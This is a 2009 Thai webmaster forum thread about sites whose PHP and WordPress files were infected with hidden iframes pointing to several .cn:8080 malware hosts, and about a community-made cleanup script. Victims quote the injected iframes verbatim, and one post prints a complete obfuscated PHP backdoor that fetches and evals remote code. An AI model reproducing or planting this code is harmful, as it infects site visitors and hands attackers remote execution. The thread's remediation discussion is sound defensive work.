แก้เสร็จแล้วนะครับ โหลดได้เลยที่หน้าแรก อัีพใส่เว็บฝากไฟล์ไว้ก่อน

อ้างถึงจาก: SaintTakumi ใน 10 มิถุนายน 2009, 20:01:41
ช่วยด้วยครับ ของผมมันใส่โค๊ดนี่ไน php เกือบทุกไฟล์เลยอ่ะครับ

โค้ด เลือก ขยาย


<iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi53" width=125 height=125 style="visibility: hidden"></
<iframe src="http://thehomename.cn:8080/index.php" width=111 height=141 style="visibility: hidden"></iframe>



ลองใช้ตัว remove แล้วมันไม่ได้อ่ะครับ ไม่ทราบจะแก้ยังไงครับ

และตั้งค่า cmod แบบไหนดีถึงจะปลอดภัยครับ แนะนำด้วยครับ  เครียดอย่างแรง

cmod 444 เท่านั้นถึงรอดครับ

อันดับใน google ร่วง และไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์คุณอีก เหอะๆ ...

ของผม รอผลรัน 2.9 อยู่ครึ่งชั่วโมง เจอ

<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe>

และ

<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe><iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe>

ตอนนี้เพิ่งได้กด FEC: Success!!!! พอมีลุ้นจะหายไหม

ขอบคุณที่มอบของดีๆ ให้กับผม

มันจะขึ้นอีกปุ่มครับ ให้กดต่อ
เพื่อรันแก้จริงๆ

ต้องขึ้น FSF: Success!!! ครับ ถึงจะทำงานเสร็จแล้ว 

เวอร์ 3.0 จะทำให้ง่ายกว่านี้ครับ แต่ขอเวลาแก้ไขหน่อย
ต้องแบ่งเวลาจากงานประจำมาทำ

แวะมาบอกว่าโดนอีกรอบแล้ว
และดูเหมือนคราวนี้จะโดนทุกไฟล์เลย

มันไม่ได้แค่แปะแทรกโค้ดลงไปแบบคราวก่อนด้วย
แต่เล่นแก้โค้ด (ตัดโค้ดบางส่วนทิ้ง) ไปเลย 

ได้ชื่อเพิ่มมาอีกชื่อด้วย
<iframe src="http://filmlifeimages.cn:8080/index.php" width=149 height=180 style="visibility: hidden"></iframe>

อัีพเดตด่วนครับ ใครคิดจะใช้ตัวเก่า โปรดโหลดตัวนี้แทนทันที

เพราะแก้ปัญหาที่ Core ภายใน และปรับปรุง Regex ให้แม่นยำกว่าเดิม
เป็นจุดสำคัญมาก และขอประกาศเป็น Stable คือไม่อัพเกรดตวนี้อีกแล้ว

โปรดรอจนกว่า v.3 จะมา ซึ่งคาดว่าจะทำให้ทำงานเร็วกว่าเดิมอีก

ปล. ฝนตก เซ็งมาก เน็ตจะตัดแล้วล่ะ 

มาเก็บไปลอง
ขอบคุณมากๆๆค่ะ 

ขอบคุณคราบ

 ผมรันทุกวันเลย จนกว่าจะได้สักอาทิตย์

ขอบคุณ

สุดยอดเลยครับพี่ +1 สำหรับผลงานดีๆ ของพี่โจ้ นี่ถ้าทำขายยังได้เลยนะครับ แ่ต่คนหล่อๆส่วนมากจะใจดีแบบพี่โจ้นี่แหล่ะ (สปอยเยอะไปไหมนี่ )

ชอบมากเลยครับ ขอบคุณมากๆเลย

ที่ตั้งใจนำมาให้ใช้ เป็นประโยชน์มากๆมายเลย

ทำให้หายเครียดด้วย อิอิ

ใช้งานง่ายมาก ทีแรกนึกว่าไฟล์จะใหญ่ ที่แท้มีสองไฟล์ เล้กๆ แต่ความสามารถเกินจริง

ขอบคุณครับขอบคุณ

อย่าคิดว่าสคริปนี้ดีไปซะทีเดียวนะครับ
ยอมรับกันตรงๆ ว่ามันยังมีบั๊กบางจุดที่ทำให้ผมงงเหมือนกัน
เช่น บางคนทักมาว่า บรรทัดท้ายหาย (พวก ?> ) อันนี้ผมก็งง
เพราะ regex ไม่น่าจะลบส่วนนั้นทิ้ง

เลยเกิดสภาพเหมือนผีหลอก หาสาเหตุให้ไม่ได้
ไม่รู้ว่าจะทำไงดี เพราะหาจุดบกพร่องไม่เจอ

ยังไงดีที่สุดคือ แก้ด้วยมือครับ
ให้คนที่เขียน php เป็น ก็น่าจะแก้ได้หมด

ุถ้าใครคิดว่าเว็บสำคัญมากๆ กลัวเสียหาย ก็ลองส่งมาทาง PM ให้ผมดูก็ได้
แต่รับแก้ให้คนละครั้งนะครับ

อ้างถึงจาก: EThaiZone ใน 13 มิถุนายน 2009, 09:54:27
อย่าคิดว่าสคริปนี้ดีไปซะทีเดียวนะครับ
ยอมรับกันตรงๆ ว่ามันยังมีบั๊กบางจุดที่ทำให้ผมงงเหมือนกัน
เช่น บางคนทักมาว่า บรรทัดท้ายหาย (พวก ?> ) อันนี้ผมก็งง
เพราะ regex ไม่น่าจะลบส่วนนั้นทิ้ง

ตรงนี้เป็นไปได้หรือเปล่า ว่าพวก hacker เค้าเป็นคนลบออกไป ก่อนที่จะแทรก iframe
เพราะรอบนี้พี่เอเจอเค้าลบบางส่วนของโค้ดบรรทัดสุดท้ายออก
ก่อนจะแทรก iframe 


สคริป vdo ของคุณ Tee++; เจอลบบรรทัดที่ 2 ออกไปทั้งบรรทัดเลย ก่อนจะแทรก iframe ในบรรทัดสุดท้าย
สคริปเอ๋อไปเลย 

อ้างถึงจาก: sealinda ใน 13 มิถุนายน 2009, 10:43:40

อ้างถึงจาก: EThaiZone ใน 13 มิถุนายน 2009, 09:54:27
อย่าคิดว่าสคริปนี้ดีไปซะทีเดียวนะครับ
ยอมรับกันตรงๆ ว่ามันยังมีบั๊กบางจุดที่ทำให้ผมงงเหมือนกัน
เช่น บางคนทักมาว่า บรรทัดท้ายหาย (พวก ?> ) อันนี้ผมก็งง
เพราะ regex ไม่น่าจะลบส่วนนั้นทิ้ง

ตรงนี้เป็นไปได้หรือเปล่า ว่าพวก hacker เค้าเป็นคนลบออกไป ก่อนที่จะแทรก iframe
เพราะรอบนี้พี่เอเจอเค้าลบบางส่วนของโค้ดบรรทัดสุดท้ายออก
ก่อนจะแทรก iframe 


สคริป vdo ของคุณ Tee++; เจอลบบรรทัดที่ 2 ออกไปทั้งบรรทัดเลย ก่อนจะแทรก iframe ในบรรทัดสุดท้าย
สคริปเอ๋อไปเลย 

อืม เป็นไปได้ครับ
ผมเคยเจอเคสหนึ่ง เว็บใหญ่โดนนะ แบบโดนแฮกแล้วประกาศศักดา
มันทำให้สคริป error แล้วแทรกโค้ดบนตัวแล้วแสดงผลผ่าน error แทนก็มี
คือคุมผ่าน error handling อีกที

สงสัยต้องการแสดงความเมพของตัวเอง 

ผมรันไฟล์ไปแล้วเกิด error ขึ้นแบบนี้น่ะครับ แล้วขึ้นเต็มทั้งโฮสต์เลย เป็นไฟล์ตัวเลขประมาณ 5 ตัว .php ด้วย หลังจากรันไฟล์ลบไวรัสอันนี้นะครับ

อ้างถึง<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="466438d6f7a8339588557c955e796a29") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

error จากสคริปผมเหรอครับ หรือยังไง
เพราะไม่คิดว่ามันจะคืนค่า error มาแบบนี้
(เวลา php error มันต้องมีมากกว่านี้)

ยังไงลองส่งเว็บมาให้ดูทาง Pm ดูครับ แล้วชี้จุดที่เกิด error มาด้วยครับ

แล้วผมลองแกะโค้ดดู ดูเหมือนเป็นโค้ดฝีมือแฮกเกอร์
เว็บ rssnews.ws

อ้างถึงจาก: EThaiZone ใน 17 มิถุนายน 2009, 01:55:39
error จากสคริปผมเหรอครับ หรือยังไง
เพราะไม่คิดว่ามันจะคืนค่า error มาแบบนี้
(เวลา php error มันต้องมีมากกว่านี้)

ยังไงลองส่งเว็บมาให้ดูทาง Pm ดูครับ แล้วชี้จุดที่เกิด error มาด้วยครับ

แล้วผมลองแกะโค้ดดู ดูเหมือนเป็นโค้ดฝีมือแฮกเกอร์
เว็บ rssnews.ws

ผมก็ไม่รู้ว่าเกิดจากอะไร แต่มันจะมี error ที่บรรทัด 197 กะ 199 ถ้าเกิดจากแฮคเกอร์ แบบนี้จะพอแก้ปัญหาได้มั๊ยครับ

เพราะรันไฟล์ที ทั้งแต่บ่าย 2 ถึง 3 ทุ่มยังไม่เสร็จเลยครับ นานมากๆ เดี๋ยวตอนนี้กำลังรันไฟล์อีกรอบ

จะก๊อปหน้าที่เกิด error มาให้ดูก็แล้วกันนะครับ เพราะผมก็ไม่รู้เรื่องอะไรแนวนี้ 

วันนี้โดนอีกรอบ

src="http://bigtopleads.cn:8080/index.php" width=162 height=140 style="visibility: hidden"

    ถามหน่อยครับว่า
    หลังรันโปรแกรมแล้ว  หากจะเข้าไปหา
    โค๊ดไอเฟรม ใน database wordpress น่าจะใช้ เครื่องมืออะไร

    และเริ่มหา ด้วยการใช้ คีย์เวิดอะไร

    คือเหมือนเว็บนี้ มันเป็นแล้ว เป็นอีกไม่ยอมจบ
    รันโปรแกรม ลงเวิดเพลสใหม่ ไปหลายทีแล้วไม่หาย

อ้างถึงจาก: baby-bride ใน 19 มิถุนายน 2009, 10:32:28
วันนี้โดนอีกรอบ

โค้ด เลือก ขยาย

src="http://bigtopleads.cn:8080/index.php" width=162 height=140 style="visibility: hidden"

    ถามหน่อยครับว่า
    หลังรันโปรแกรมแล้ว  หากจะเข้าไปหา
    โค๊ดไอเฟรม ใน database wordpress น่าจะใช้ เครื่องมืออะไร

    และเริ่มหา ด้วยการใช้ คีย์เวิดอะไร

    คือเหมือนเว็บนี้ มันเป็นแล้ว เป็นอีกไม่ยอมจบ
    รันโปรแกรม ลงเวิดเพลสใหม่ ไปหลายทีแล้วไม่หาย

เป็นคล้ายๆ กันเลยอะ
เริ่มเป็นประมาณวันที่ 18 มิย. เนี้ย รอคำตอบด้วยคน

มันแสกนไม่ครับอะครับ
มันหยุดไปดื้อๆเลยครับ แก้ไงครับเนี่ยะ